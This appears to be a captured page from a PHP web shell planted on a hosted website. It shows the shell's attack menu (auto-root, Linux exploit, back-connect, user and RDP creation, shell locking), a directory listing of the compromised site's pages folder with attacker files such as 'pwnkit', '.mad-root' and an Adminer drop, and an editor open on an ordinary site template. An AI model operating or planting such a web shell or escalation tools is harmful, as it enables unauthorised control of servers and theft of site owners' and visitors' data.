Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
views /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
about.php
7.24
KB
-rw----r--
activities.php
7.28
KB
-rw----r--
adminer.php
0
B
-rw-r--r--
contact.php
7.24
KB
-rw----r--
home.php
15.57
KB
-rw----r--
news-detail.php
7.16
KB
-rw----r--
news-list.php
6.83
KB
-rw----r--
pole.php
2.79
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
subsidiary.php
7.3
KB
-rw----r--
vision.php
5.58
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pole.php
<?php $l = $lang ?? 'fr'; $actBase = $l === 'fr' ? '/fr/activites' : '/en/activities'; $poleColors = [ 'communication' => '#FFCE00', 'medias' => '#1A6B8A', 'telecoms' => '#2E7D4F', 'divertissement' => '#8B2FC9', 'industrie' => '#C94B2F', ]; $c = $poleColors[$pole ?? ''] ?? '#888'; ?> <section class="page-hero" style="--pole-color:<?= $c ?>"> <div class="container"> <a href="<?= $l === 'fr' ? '/fr/activites' : '/en/activities' ?>" class="breadcrumb-back"> ← <?= $t('nav.activities') ?> </a> <span class="section-label" style="color:<?= $c ?>"><?= $t('pole_label') ?></span> <h1 class="page-hero-title"><?= htmlspecialchars($poleLabel) ?></h1> </div> </section> <section class="section"> <div class="container"> <div class="subs-grid-full"> <?php foreach ($subs as $sub): ?> <article class="sub-full-card" style="--card-color:<?= $c ?>"> <div class="sub-full-header"> <h2 class="sub-full-name"><?= htmlspecialchars($sub['name']) ?></h2> <p class="sub-full-tagline"><?= htmlspecialchars($sub['tagline'] ?? '') ?></p> </div> <div class="sub-full-body"> <p><?= nl2br(htmlspecialchars($sub['description'] ?? '')) ?></p> </div> <div class="sub-full-footer"> <a href="<?= $actBase ?>/<?= htmlspecialchars($pole) ?>/<?= htmlspecialchars($sub['slug']) ?>" class="btn btn-primary"> <?= $t('discover') ?> </a> <?php if (!empty($sub['website_url'])): ?> <a href="<?= htmlspecialchars($sub['website_url']) ?>" target="_blank" rel="noopener" class="btn btn-outline"> <?= $t('visit_site') ?> </a> <?php endif; ?> </div> </article> <?php endforeach; ?> </div> </div> </section> <style> .breadcrumb-back { display: inline-block; margin-bottom: 1rem; font-family: var(--font-cond); font-size: .78rem; letter-spacing: .1em; text-transform: uppercase; color: var(--c-grey-3); transition: color .2s; } .breadcrumb-back:hover { color: var(--c-gold); } .subs-grid-full { display: flex; flex-direction: column; gap: 2px; background: var(--c-dark-3); } .sub-full-card { background: var(--c-dark-2); padding: 3rem; border-left: 4px solid var(--card-color); transition: background .3s; } .sub-full-card:hover { background: var(--c-dark-3); } .sub-full-name { font-family: var(--font-display); font-size: 2.2rem; font-weight: 700; color: var(--c-white); margin-bottom: .25rem; } .sub-full-tagline { font-family: var(--font-cond); font-size: .78rem; letter-spacing: .15em; text-transform: uppercase; color: var(--card-color); margin-bottom: 1.5rem; } .sub-full-body { color: var(--c-grey-4); line-height: 1.8; max-width: 700px; margin-bottom: 2rem; } .sub-full-footer { display: flex; gap: 1rem; flex-wrap: wrap; } </style>
Close